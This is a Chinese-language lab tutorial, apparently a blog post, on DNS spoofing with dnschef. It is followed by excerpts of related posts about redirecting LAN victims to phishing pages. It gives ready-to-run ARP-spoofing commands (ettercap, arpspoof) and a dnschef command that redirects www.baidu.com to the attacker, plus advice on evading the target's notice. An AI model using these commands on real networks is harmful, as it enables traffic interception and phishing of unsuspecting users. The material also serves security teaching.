DNS欺騙 下 dnschef實現

2021-10-04 23:26:57 字數 1521 閱讀 2867

一、dnschef實驗環境

二、操作步驟

1、在kali上開啟arp欺騙(二選一)

ettercap -t -q -m arp:remote -i eth0 /10.10.10.135// /10.10.10.2//
arpspoof -t 10.10.10.135 -r 10.10.10.2
2、在kali上開啟dnschef命令

dnschef --fakeip=10.10.10.136 --fakedomains=www.baidu.com -q --inte***ce=10.10.10.136
此命令相當於在dns伺服器中加入一條以下a記錄

www.baidu.com  a  10.10.10.136
此時netstat命令,發現python(dnschef)開啟了53埠

root@kali2020:~# netstat -anput

active internet connections (servers and established)

proto recv-q send-q local address foreign address state pid/program name

tcp 0 0 0.0.0.0:22 0.0.0.0:* listen 608/sshd

tcp 0 36 10.10.10.136:22 10.10.10.1:54952 established 3526/sshd: root@pts

tcp6 0 0 :::22 :::* listen 608/sshd

udp 0 0 10.10.10.136:53 0.0.0.0:* 5122/python3

udp 0 0 10.10.10.136:68 10.10.10.254:67 established 552/networkmanager

udp 0 0 0.0.0.0:69 0.0.0.0:* 593/inetutils-inetd

三、ettercap與dnschef對比

經過對比,很明顯ettercap使用dns_spoof外掛程式的情況明顯比dnschef好用,dnschef使用時多了一步在客戶端的dns伺服器設定步驟,且其開放了53埠,更容易被目標發現。

bettercap實現內網Dns欺騙

讓內網的所有計算機瀏覽網頁的時候,出現我的釣魚頁面 kali系統 bettercap 通過ifconfig檢視當前計算機的ip,我這邊為,192.168.1.150 建立乙個dns.conf檔案,下面這個dns語句的意思是 所有的.com結尾的 全部解析到我的本地http伺服器,com就是乙個正則,...

DNS欺騙攻擊

1.dns網域名稱系統 其主要作用是把主機的網域名稱解析ip位址的系統,即使伺服器更換了ip位址,我們依舊可以通過網域名稱訪問該伺服器。dns網域名稱查詢可以簡單的分為五個步驟 2.dns欺騙 dns欺騙就是利用了dns協議設計時的安全缺陷。首先欺騙者向目標機器傳送構造好的arp應答資料報,arp欺...

演示DNS欺騙攻擊

dns欺騙攻擊基於中間人攻擊。攻擊者更改受害者從dns伺服器查詢的網域名稱解析結果,給受害者傳送惡意網頁或釣魚網頁 瀏覽器依然顯示正常的url。本帖介紹怎麼使用ettercap施行dns欺騙攻擊,實現受害者訪問任何 都轉向到攻擊者指定的 情形描述 同一區域網內 受害者ip 192.168.0.106...